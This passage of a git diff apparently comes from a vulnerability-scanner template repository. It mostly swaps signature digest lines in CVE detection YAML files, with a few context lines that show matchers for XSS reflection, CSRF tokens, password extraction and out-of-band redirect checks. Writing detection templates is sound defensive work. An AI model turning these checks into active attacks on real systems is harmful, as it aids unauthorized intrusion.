4b0a00483046022100d97fe9d2af29c15dc73b8a19c1f69016ed9cf31e60a5767759fe6c56ba2601a2022100d80cb2be444aeac965e4c0abdc2f71d2d232416217054298f34b26cd50c7c429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022021766a949cd8ce92eba5417c3955b72e5125cbeb4e851636eb75685f6d0fb24c022100c54171ad7da1e1f3267551cb193282182c18b7e80504d734197d6dd16b8b5d1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 0e14af4ba6..055295ce1d 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -65,4 +65,4 @@ http: regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' part: interactsh_request -# digest: 4a0a004730450220251a5e0fed581fcfeb62eda5c7320913dc45d41e9d3a17e40ff963b7ec6bf7bb022100a851f4d7f5205ec1dc955bdd0d285e0d7e380efde8ac49d3dec58ed7a677db6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd03e342025e4e4e80c95f6b5830928e3c04fa9aaf85d57c0c25b011d377f2dc022071e70c560ca19c5672698896f856d803cc045931a344b12763e88e9576237d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index 50b56671f4..dc9e2bc9d0 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -68,4 +68,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a0046304402202f7c5ec782c15c9e2283d7a395b38639394668e4926e5256f17bd15c01a48b550220733ea68014deaa76cd6eb149fa40f8dc6cc38bbc1686f370c683bca1e7b15c5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009ced93a185c58b88df1c70897c1f6dfbaf25212b4cf23e967daab07a3f4f8b26022100d60ce7b8a964ef513617dbe328e1d821211c417229337310c3ed6f29afc9be9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index 6d3f685a3d..762fd50d19 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a00463044022024f1b4397b5259096b3834d56e20ade3350323ef4131fb0cc5c225ad63dedfc3022022204d8791d85002284c41b635deb56440af75f6fbe8bc85afaac26ed3589e62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027e4cfe6c74428a54ab533bd2a916dc9d6cf210d604b99c8966d52ce649709bf022100ae914cfbdca0edf2dc747a74933906c9fefdb395d0ca32ebffc53fb08a8afd29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index 0f7481cd1c..e1ec2a722a 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -68,4 +68,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022078e8f384c073f04187e7ecaa23493ea0407fa54e1c570bdc4a4c07f2c0e0aeb7022100c361072086badba50693529add0141de6f5fd89d5d8575733ec9c8add9f81bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe70fa0361640569e01148b22519eb88b8958d59fa15a830cef91157f8384e7702201023fc8e27b30af579fde71a67ae5c6ecca49e54286a3405e7b86c949c9c3b64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 87985331b8..40741fd8ef 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -68,4 +68,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a0046304402205b6515306a5ef9306b7d686e82462ce1df63dce1c25583df5601045b4cf4a31d022078af5b19991d9970bb152e4c5a8568dd4bfc3f29ea04e457305f13211933789f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d6f322953dacdad93f04bc1381201d8bfdeb9c2d04cd3c3546f389ce84505c702204b9d95f0912ea15c7f120e0858c15494e70113915191df198bf56fc3d167bb8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index ef529d9285..4066ab57c2 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -136,4 +136,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 4a0a00473045022037ac8cfd48d6e676a3f4070803b999e42015a084c80c82903af299f909a3f4c0022100d3e3d7588abcfac6a671c786adbb650b7df45706ff32d77b8cd302a48ee9b9f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a7d4964d1905789736e3a4f7d81c97da2e2fcb7587fbc44b9b77b31565f024f802210095e49a98d6ecd2b58fb7b31f6080ec748944219252388c4f71d1cb79cb4a5d8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index 191c90351e..f4a4f29b6e 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -136,4 +136,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 4a0a00473045022001a28e54084dcf3166039fad4b05645b273c717120b1d20a00477f3fef70fe2d022100b25e6ef84ecf7425a03c0eb0b95ee1e0c051e5d3e099755d74b83057bc955aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ac0fdf892a88e6623b9ea9eb161e13825b21005149165a114a80210ac403468022100be64ce591a07ff770d1fb4b7f5c8eba983dafc66047ab3ed86438c32bf30ce53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index 6fefe8f747..660d0658d8 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100f6a6e75d3fcbeefb7bfe70fa11407ec0b7055b0830115dccaed3687cde983b03022100cb450ef92e316a1a23d3173d3838b7b51de7154dc44f3b963cda8866e4e95e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d44916dd81f7ce94612f0c1e2890e7134330c3cdfde072afb0bebee2637645a60220528367fdcb13fe02279faadd362eb0997a4ba128c73c674e232b193e92f54e57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index f0c9738bde..def3523eff 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -149,4 +149,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 490a0046304402202de06b8a6e888b2993c09a60cfd35c2c48341bc45d7140638b7da6a9f927e15c02205443f1e3d88ae7dca53733dc34930bd1491cd200d6b944d53412de96d56c8bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075dd10c8952c99d3765de618d4a12b1121e846f8a3f50fdb0a7d81cd182332190220675cefe52e74f4fce21384e4e29d88abbc39992e277077451f596820960ea506:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44957.yaml b/http/cves/2022/CVE-2022-44957.yaml index 4b9c6a44cd..b83792639c 100644 --- a/http/cves/2022/CVE-2022-44957.yaml +++ b/http/cves/2022/CVE-2022-44957.yaml @@ -168,4 +168,4 @@ http: regex: - 'name="csrfToken" value="([0-9a-zA-Z]+)"' internal: true -# digest: 4a0a00473045022058e04c959164a6887128bff5e2c81ff9a549a4941e0adc621d267e956d6d1fe1022100d36b02df2b82b6dd9d1065d82767ab1ec79b2649450f25d69ecffca80b581608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b4a13ff7bbbcf2d7e1b9b282d20b180d7d41aed95b378f25b5c10ff31ec0733d022100f911e14dc71efd6ca82157416ed0b18b686711bd881b9c5b9bfe08a99b67f699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index 462c4d2f12..07a2b5374f 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206621ba65377b37becb2284647d51d4fe5423206a1ad56f63d7415c1fc1df85b602205154d8ffe0a0ab0837dcfabe75991d8434b2c1787f71eedbb5faad326966cc53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d3aee961f865ab0369274e259216c6aeb8c0e3e05085fcc01c6e0bdc64144aec022100c8df2a03150f4267cb69a65308a40da4bcfe440d407ddbcf758fd1f0d6360525:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml index 62f5c91dc9..e74f9d6693 100644 --- a/http/cves/2022/CVE-2022-45365.yaml +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022046a2c0fe907c58a9b3874b212d37ff610222781cef5966b7b7b95dd4e0f16b7902210081f249fa4a02e7e56036f9e4c8e11172e9948b3236b1a137878fd87c08f037dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b013fa8cee3a52712247ffcd2dc866e9fd3ca0812ee6b12ed34bc232b93a22f50220238f3dbe08c862c1f4dd2e1dce53b879a0e957e1c0328e8f606a4d1dc5b39a77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index a473a14b69..1f6eaad2f3 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -51,4 +51,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "toplevel_page_paytm")' condition: and -# digest: 4a0a00473045022100fe699581fce1607f8724c7eac0c383fe061097ffc20bc0354bc2e269838e870102203fccdf0ab3f4266ac65a87df7587b0382e83527c032d713c3504102914c28652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a74234b549831b4e24377282c733bafd074ef02d19d218eff1112a48b29e2eab022100c94f1431b5c09cc148bfdd9942d6fbc7860eec0e17676e3a9ea37e310b8bd7b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 3697e93e1b..e85e861ccb 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -45,4 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022074c907eb4d6662a485c5cf6a20275f49eb358e805470537fa2dbc2bce50294bf022100ba0bf38c3ae8f7f5c83e2be6e7139d53450397f272542f5ab8fb570c876547cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dcb22e6c510cd8249b7da40e18ca2b37a495d6532ca3c7dc25c792c87a787e4f0221009b2ee3dc8e5dc4ccb06be4f0848082b21ddd75cb8c3bc3e91ace472f66cac295:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index eb8bab2b14..6553267523 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220200e122e6eeec45a80ae0d0335df320257e3e9c799280f827b9723b0103c57110221008ea2080e9b1a75447e165727409b6f4771777d8d18009062312e9b3cfc5838ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203a57686d800971e9c2d9e5c6af79ff460d57e595cc69bce08b60c90622d3b2c7022100a476ff76a56c7f5fba89e4a8a776f2e7e19a8c74054dfd44dbdf5404bf76a99f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index 4ea36a824f..406c627a59 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -133,4 +133,4 @@ http: - name="app_name" value="(.*)" internal: true part: body -# digest: 4b0a00483046022100bee894518d0df5b4a5fb8ca9f0483c5c30d8820a121cd0c4cf47e5749e14e6b1022100891072b4407c52cbc62bfa211b7b3a2a4d05c4ccebf5731125a1a427cb36b9a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e5e190acbf1701cb0513a17c27b6a5b7303c1fa2276a019790ce5daf06d82d20221009ca29bb2afc010a7a187729c866093da7d269789bdbb436773e3d2ddee285bd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index a5700101bc..7e6b439799 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -41,4 +41,4 @@ http: - 'contains(body, "Helmet Store Showroom")' - 'contains(body, ">")' condition: and -# digest: 4b0a00483046022100ed99835750f27c932a666b47b8ed34582dba5c25daf8c74117a8db9617cbf2b9022100b765f603c369d4027a97f08b675357a4d3f582d39d36c3c9d7b518960c0d05c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041a2e647421ab3a844ec1c371106d0ec3db2a0029f268b16732bfc3be590cd170221009c5847c2b2ce43c8f05a86525d82f698c4b917632335d94abd441ebbaab49947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index e4d0b209bd..aa6fc64388 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022071f74228b25467f72a73a0de7752856fcc91f8007aabe12243c65efd266c964e0221008b3834ed9625a3c5474e7bbd30bdd914c70c2d10bdf64aa7f607fa97cc50acd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d6af7c0ad168b3fb85272dc44681080e4a7ed2456efc19b6defc684e1a0562ff02210084e9b807f03f3273017b3a5fbc4d558ae8c2875b04f72515dabbe355a2818806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index 32c0b9aed8..43c09d75ef 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202d49a19c38ab4b9a901abd5e6c90fef4882504cb73444882c2105d186ec64932022100ccca00e7eaba64835c620d5df47e2aad6ee450f81abf2f755260439020d500ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022052802cfd25ee856c332eb660c66830c3689544bd7aba2b8ff4b1500de1e2027802200778be104007082ada0fc04e635bfe5324e1e1a495df93bd3c658b457c9cef64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index df7855cbc2..39976e87b5 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ae28ae8282c8eb129103ba15f2fd67f65c28194c70a1af8a99f9fc022671ca82022100b90c66835be66c887739e09bd92a805dd35a406549624e51b00d6219a27c7810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f15bdb646922e7f1f7fc7504fc102bf824f55de7f20ddefc2df4385247d6f2080220533beeebe11e9d490c154698a009f1b67a77f33a29366c378358d3bcfacdbcf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index 2b26609a94..4e02ca493e 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204866b4c509c48b1775499644d345df8c431567004b38f8674c3938f617ec6cb7022100f594663ec51fd629d1fb0e1dc42018110f37b87bf5cef07e0f83faeaf4b3acc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220081baa985fc1033d4ac4acecf70f0c6d36ebd6166ce094078b99c08d24143515022006d5ecfd03e07daaef2f30a3221a2fb37ca70d3bf0a7c34a95c71ffdbca43b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index 899d732f10..5ae2e1994a 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008687eab5b9874540b862eebf395db04e1b3280e879a414b6e83b1585e9630e3602210088fa6bef6acacfe1d08604f7b405bda69f1dbf7bd2a1b4fa178d4a2ce1fed6f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022046cb66c855a26f79d49ac35934e0d4a2803899ae12afc6bdc9b7a73a129c639d022100925c6fa136fedd27f810c9e078540c040554272d25ad71db1ff179378902b2e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index f27b2580d7..edf8e1eff8 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -76,4 +76,4 @@ http: - '"lastupdatebyid":"([A-F0-9-]+)"' internal: true part: body -# digest: 4a0a00473045022100e3097e1250b20cab477464c81fac1ed317a7219c4e7a2c1a708487b21d40dd1d02202a1a5c6c96fb4cb4b010a4a7fc3023d770492fb35b2e1291eca3d007beb48c8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4b5c77043fd58c33c2003e2800f45efaa99ac3907c021513ce8c19ba33741ad022054815969a3defdf9bd793eaab97d2b5d4f56ace691e5b463db543177a892d402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47075.yaml b/http/cves/2022/CVE-2022-47075.yaml index b0e61e055a..c3ff998c34 100644 --- a/http/cves/2022/CVE-2022-47075.yaml +++ b/http/cves/2022/CVE-2022-47075.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "application/CSV")' - 'contains(body, "EmployeeName") && contains(body, "EmployeeCode")' condition: and -# digest: 4a0a0047304502210088fd6b3b11c7336d9211442a34460434445fbf2ed05f120310724e4f87057c8202207cd6f25b4bd701c32a7ecab0dfcb2a4c5ee230b2f1a4dba3370b976ea6c289f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038dc62b16bdae6d87b4226c574c3dcbc8829caf844c27d940adc6af39a52e4ac02210086ad3e6ad5d37a37b6310032f2db54f28b83ca7de6a55d8feb9cd2ba89c9d705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index 8f322aad70..232421323d 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205e9ec553e489d577c4f95c9ab6a58c65d2697e33577bbeb887bdca3fdd7eb11c022100e65fc1ff00cfb250ace1c8561fd251745f59695c763eb6813cdb77a9ea6f7d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e97aad495112770ba4acb8126e83254747ceb8ff603eaa87925208d4e8d3890b0221008e6cfe1ab83fc37ab9c4670a4add34a9be5189dbb1adb8c487b34f2c345e31ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index b7cc1fbf5b..910a6fbdba 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100df8f921b60a2916578e9e578f153d97a1c3480c75e5a814cf8c4871e81a16a36022100f6bb590562d0bc593116e95316cb3160929015320ad42460f32a707e1b56b717:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed504b6bb2d73ae075772d8bbeef9388f102078b13b0c56eb81f740139a70eb8022100986d820b3bf728c892f1909f80ab0498e055aaa89b2c446f992b1c9073a4210d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 733f3c9c93..0b34a2dd6c 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 500 -# digest: 490a0046304402206656a0fc37b7f0312aac5169982c93b4aac3020a2f6b2467e912d8c9933b6e9d02203bf33f091982581911fac44f49b846db225def97cd5c8621957b4764b3a8dff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201470d322dc6b0680a49f09870bcafdb0b02e4a95c1c5c66c5ce3738f6504e97b022100958fef932a5c251fc404ce725e6ae71ea58d6f4acab4a67b2415c49f5b2d4da8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index 9eb86b1a78..97d973e7db 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450221008675f8d534749551dab1d522c3c1c441fc71faed4af70e415d9d1febd2fedada02201af48287edc494e68291e01b9138bfbedaf6d0d4719ce26de683a02197a2fa63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009865277077046199a9fd615bff84b7283df98ce4d3192205eaf8ee7ad69d739f022100f11cc68200e46913732ea7e9004ea292337844397be7504925a8221459e698df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index 61a7b5fd56..85df6e54b5 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -56,4 +56,4 @@ http: - contains(body_1, "opencats - Login") - contains(body_3, "") condition: and -# digest: 4a0a00473045022100bf1b87f270fb0aed2ab736915be3ec75e3b98c425a01af5211530e7e237f0416022028819402aebde09c1e9765f00d4697a0b9ed5af68ca77d5f46730f06ab241275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022007b44ea4a13dae7e36848180fb7fabc80a68aa184664357712392ace77f407020220282032af57d8f021333f3c51dec5920fd7fb12c54d6a44a5c764ea12bc275502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index ccbc0f2b32..3003c654c1 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -60,4 +60,4 @@ http: - type: regex regex: - 'Password=([^\s]+)' -# digest: 4a0a00473045022100ad34103eba846a7940233f943b5f7f29ae6a400d2382dcd1de5d88c7a26f0b9d02203402a3e5e4630782bd667064414026e295dfe7892eae0210d7f9afcee667c501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022056539b6cd3745e8d5dac980c0dfa0c22f75edcf4a24a9b1bf7f9c73769790efb02203bb9b12fdbd27068e9be86fb0334827b8bd8e30005b9a1c863645194cea28f1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index 5871dedba4..2483354417 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200aa8dc45df93b31a509392bc137d444a730cbc113463d4d68a4cfb6d1e29e7b902202a7bcbef9175bddea3bf0e2803fecb56207e4961e90ae4011704631f27b92908:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d04ced5ba0c4a1ead607d2759900e2f98b0f90ec3fcc45243650dc4f3d072afc02203113a7fc6d68c59429fd448a03c3ff629e54408c1026d776db300c86b9951ff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 4dc3cc0ba6..c8071ec09f 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "onload=alert(document.domain)")' - 'contains(body_2, "BackupBudddy iFrame")' condition: and -# digest: 490a004630440220026a95c6a87aa0d2140d2a60adc495b4a0dad0cdd2317d7549a94ce433f36cb902207b8b7822fd59ff49758d0f24180dbab021c12624f025de15725d063df72e3fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb17d717cfb49161b5dcc3386a53765abb55ebdc47feae0fb340a0a0e4e1f861022100d13e12abf5f2d7814125b0581f7bc28f5a444d5d6fdf66bfb32bc5989d271f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index 0a29570785..c41dfea81e 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -50,4 +50,4 @@ http: - 'contains(body, "")' - 'contains(body_2, "search_term")' condition: and -# digest: 490a0046304402203b4a80a87f3d0e0dd7e3f72258762bb37aba818f7dbe6ac5028735d7fafe84000220687feef5645a29a70482987b64ca91f982de7c388a6de07865be17b5785e2de7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1e3263b6d6d0a0c9237713a1f7732ebd9b9d49e7f9807d85154d0f4831dbb6b02201fa389258a3890e6ff4642ec5ac60d8bb9b0983f1616cb00de1abd6824382ac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index 3d15ba075e..40cff19ad2 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200389081a932ced2d9a9428eabc1ee2915f6f625fed573338636978dbcba058d0022100fa051ef2ac0253e86556778b0ce71fb678f577a2bfab19ae5d126ca0706da96f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf33c281aac014812de31f1d2e6ee14c6784d3b2360cfbbb3b77d83ada2102f4022100d98e1e4661863d6887d334c68f10ef2f737a295dcb0b074c45094f4b9aaadb7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml index b001cae206..7ab571c47e 100644 --- a/http/cves/2023/CVE-2023-0159.yaml +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009c218f291c5363beefd7ce01020284bf03b70918ba816b90527242a2167e5b85022014a99ea6fb8ea862e3d2983fa1fa38e7e3fc0e4d3cd8e49d315b0226c8027209:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 